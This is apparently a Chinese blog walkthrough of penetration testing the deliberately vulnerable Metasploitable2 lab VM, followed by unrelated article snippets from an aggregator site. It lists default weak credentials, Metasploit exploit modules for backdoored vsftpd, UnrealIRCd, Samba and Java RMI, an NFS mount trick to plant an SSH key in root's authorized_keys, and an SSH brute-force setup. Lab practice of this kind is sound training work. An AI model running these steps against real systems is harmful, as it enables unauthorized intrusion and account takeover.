metasploitable2滲透測試

一、系統弱密碼登錄

1、在kali上執行命令行telnet 192.168.26.129

2、Login和password都輸入msfadmin

3、登錄成功,進入系統

4、測試如下:

?

?

二、MySQL弱密碼登錄:

1、在kali上執行mysql –h 192.168.26.129 ?–u root

2、登錄成功,進入MySQL系統

3、測試效果:

?

三、PostgreSQL弱密碼登錄

1、在Kali上執行psql -h 192.168.26.129 –U postgres

2、輸入密碼:postgres

3、登錄成功,進入postgresql系統

測試效果

四、VNC弱密碼登錄

1、在kali圖形界面的終端中執行vncviewer 192.168.26.129

2、輸入密碼 password

3、登錄成功,進入系統

測試效果:

五、Samba MS-RPC Shell 命令注入漏洞

利用步驟

?1.在kali中執行msfconsole,啟動metasploit

?2.Use exploit/multi/samba/usermap_script,選擇漏洞庫

?3.Set RHOST 192.168.26.129 設置要攻擊的機器IP

?4.Exploit,開始攻擊

?5.利用成功,執行uname –a 驗證

測試效果:

?

六、Vsftpd源碼包后門漏洞

步驟

1、在kali中執行msfconsole,啟動metasploit

2、use exploit/unix/ftp/vsftpd_234_backdoor,選擇漏洞

3、set RHOST 192.168.26.129

4、利用成功,執行uname –a 驗證

5、測試過程:

?

七、UnreallRCd后門漏洞

步驟

1、在kali中執行msfconsole,啟動metasploit

2、use exploit/unix/irc/unreal_ircd_3281_backdoor,選擇漏洞

set RHOST 192.168.26.129 ,設置要攻擊的目標IP地址

3、開始攻擊

4、利用成功!使用uname –a 驗證

測試效果:

?

  • 八、Linux NFS共享目錄配置漏洞

問題:在(2)中需要創建 /tmp/test目錄并在目錄下創建,如未創建則不能進行下一步

步驟

  1. 在kali上執行命令rpcinfo –p 192.168.26.129 ,查看nfs服務有無開啟
  2. showmount –e 19168.26.129 查看其設置的遠程目錄列表
  3. 輸入ssh-keygen 生成RSA公鑰
  4. 依次輸入:

(1)mount –t nfs 192.168.26.129://tmp/test(預先創建),把192.168.160.131的根目錄掛載到/tmp/test/下;

注:如果提示下圖中錯誤則需要/etc/init.d/rpcbind start 來啟動mount

(2)cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公鑰追加到靶機的authorized_keys下:

(3)ssh? root@192.168.26.129,實現無密碼登錄

九、Java RMI SERVER 命令執行漏洞(1099/tcp)

1.Nmap –p 0-65535 192.168.26.129 來查看1099端口是否開啟

2.進入msfconsole框架,依次輸入以下命令:

1)use exploit/multi/misc/java_rmi_server

2)set RHOST 192.168.26.129(靶機的IP地址)

3)run

4)session

5)shell(進入meterpreter時執行)

十、Root用戶弱口令漏洞(SSH爆破)

步驟

  1. 輸入nmap –sV? -O(大寫) 192.168.26.129 查看SSh端口是否開啟
  2. 開啟metasploit framework 框架,依次輸入:
    1. use auxiliary/scanner/ssh/ssh_login
    2. set RHOSTS 192.168.26.129
    3. set USERNAME root
    4. set PASS_FILE? pass.txt(字典文件,需要預先生成)
    5. set THREADS 50
    6. run

我在網上找了Metasploitable2? 靶機,下載了解壓出來,打開直接能用

鏈接:https://pan.baidu.com/s/1gV75x5wV4-1TsDTIZoImXw
提取碼:gx9z
?

?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/375103.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/375103.shtml
英文地址,請注明出處:http://en.pswp.cn/news/375103.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Portainer.io:讓容器管理變得更加直觀

在現代軟件開發和部署中,容器化技術已經變得越來越流行。Docker 是其中一種領先的容器化平臺,而 Portainer.io 則是一個優秀的管理工具,使得 Docker 的使用變得更加簡單和可視化。本文將介紹 Portainer.io 的基本功能和如何在 Docker 上安裝和…

倉庫信息查詢練習

use cangku create table cangkubiao ( cno varchar(50) primary key not null, city varchar(50)not null, mianji int not null ) insert into cangkubiao values(wh1,北京,370) insert into cangkubiao values(wh2,上海,500) insert into cangkubiao values(wh3,廣州,200) …

python開發的一些tips

1. Notepad編寫python腳本 1)新建文件,編寫代碼 2)點擊菜單欄,“語言”—>“P”—>“Python”,設置腳本為Python語言的高亮(這樣保存文本的時候,Notepad也可以自動識別文件類型為.py&…

metasploitable3滲透測試

1、攻擊windows服務器漏洞 用nmap對網段進行掃描nmap -sP 192.168.123 在進行IP掃描 發現Windows服務器漏洞 步驟: msfconsole---進入滲透模塊

以前寫的一個下載小說的工具

因為當時發現只有一個站點有。但是時時聯網的要求太讓人不爽。就寫了一個給全下下來了。 用到了: 1. 正則表達式,分析章節和內容; 2. 線程池下載,并且對下載中的相關超時做了一些處理; 3. 文件生成與寫入,注意格式問題…

數學之路-python計算實戰(14)-機器視覺-圖像增強(直方圖均衡化)

我們來看一個灰度圖像,讓表示灰度出現的次數,這樣圖像中灰度為 的像素的出現概率是是圖像中全部的灰度數, 是圖像中全部的像素數, 實際上是圖像的直方圖,歸一化到 。把 作為相應于 的累計概率函數, 定義為:是圖像的…

Windows2008的安裝

點擊下一步 點擊安裝 選擇第三個,點擊下一步 點擊下一步 點自定義安裝 我在這里分兩個盤并格式化 接下來就是等待安裝完成即可

Ubuntu下在Apache中運行Keystone

最近一次從Github上更新Keystone的代碼后,發現原來bin/keystone-all和bin/keystone-manage都不見了,取而代之的是keystone/cmd/目錄下的all.py和manage.py兩個python腳本.雖然在測試的virtualenv環境下仍然可以執行原來的命令,但是想試著在Apache中運行Keystone,畢竟這已經是社…

redhat linux7.0的安裝

選擇第一個 我選擇中文 點擊開始安裝 設置root用戶密碼 完成如上圖所示 我在網上找了一個redhat7.0鏡像供大家使用 鏈接:https://pan.baidu.com/s/1WhG8BGZTZawDKTNlaAvzRg 提取碼:uzpd

鳥哥

bc計算器 scale4 小數是4位 whatis ls make what is ls --helpman lsman -k passinfo pass [rootcentos01 ~]# ls /etc/init.d/ #服務所在的文件夾 [rootcentos01 ~]# runlevel #查找自己在哪個級別 n 表示上一個沒有N 5-bash-4.1# init 3 #切換到3級別的服務 級別0 關機模式級…

[奇葩 bug]視圖在 ipad5 上正常顯示,在 iPad3上超出了邊界

一,問題分析 1.理論上 iPad 是按像素點排列的,可 iPad5為什么和 iPad3差別那么大??? 2.iPad3超出邊界的視圖,都有一個 leading 是superview 的 leading 加上-20.感覺是這個地方有問題. 3.重新添加一下約束,去掉了那個默認的 constraint 選項,就沒有那個-20的差值了.運行后發…

VMware虛擬機安裝

創建新的虛擬機:在 VMWare 中創建虛擬機,要求設置內存大小為 1G,CPU 為 2,硬盤大小自行選擇,網絡連接采用 NAT 模式,其他保持默認即可 上面是安裝啥系統就選啥系統 下一步 下一步 磁盤大小按自己需求來

二叉樹算法:中序、后序推導先序(數組遞歸實現 【*模板】)

中根序列和后根序列重建二叉樹 描述我們知道如何按照三種深度優先次序來周游一棵二叉樹,來得到中根序列、前根序列和后根序列。反過來,如果給定二叉樹的中根序列和后根序 列,或者給定中根序列和前根序列,可以重建一二叉樹。本題輸…

福昕熊雨前:PDFium開源項目的背后

今天編譯android的時候,無意中看到命令行提示出輸出編譯external/pdfium這個目錄,于是乎上百度搜索了一下,找到了如下關于PDF文件解析的開源代碼的文章: http://www.csdn.net/article/2014-06-23/2820351-Why-Foxit-Open-Sourced-…

Windows主機安全加固

Windows主機安全加固 賬戶安全 更名administrator本地用戶并禁用guest賬戶步驟: 點擊“開始”,找到“管理工具”,點擊里面的“計算機管理”,找到“本地用戶和組”

JS筆記 入門第四

小測試:注意:取消所有的設定可以直接使用document.getElementById("txt").removeAttribute("style");這個是個神奇的東西.<!DOCTYPE HTML><html><head><meta http-equiv"Content-Type" Content"text/html; charsetutf…

數論神題——進擊的羊角獸

數論神題 進擊的羊角獸 題目描述&#xff1a; 求滿足 \(ab|ab(a,b \leq n,a \neq b)\)的有序數對\((a,b)\)的個數。 solution 設\((a,b)d , (a < b \leq n)\),則$ axd , byd , ( x < y )$ \(ab|ab\) \((xy)d|xyd^2\) \(\because (xy, x)1,(xy, y)1\) \(\therefore (xy)|d…

靶場練習第一天~vulnhub靶場之Me-and-My-Girlfriend-1

兄弟們第一天打vulnhub靶場&#xff0c;我kali連靶場ip都掃不到&#xff0c;淚奔了&#xff0c;不說了開整 注意&#xff1a; vm虛擬機里面的編輯下面的虛擬機網絡編輯器&#xff0c;把除了NAT模式外的模式&#xff0c;其他模式不啟動。 至于為什么要這樣操作&#xff0c;感覺…

ubuntu的網絡配置

1&#xff0c;檢查網絡是否通暢 ping www.baidu.com 2&#xff0c;檢查網線是否插好 3&#xff0c;使用ifconfig查看當前活躍網絡接口 ifconfig 4&#xff0c;配置IP地址、子網掩碼、網關地址 sudo vi /etc/network/interfaces 確保此文件中有以下信息&#xff1a;&#xff08;…

pstree 命令詳解

作用&#xff1a; 以命令樹狀圖的方式展現進程之間的派生關系&#xff0c; 顯示效果比較直觀。 選項&#xff1a;-a 顯示每個程序的完整指令&#xff0c; 包含路徑&#xff0c; 參數或者是常駐服務的標志-c 不使用精簡標示法-h 列出樹狀圖&#xff0c;特別標明現在執行的程序-l…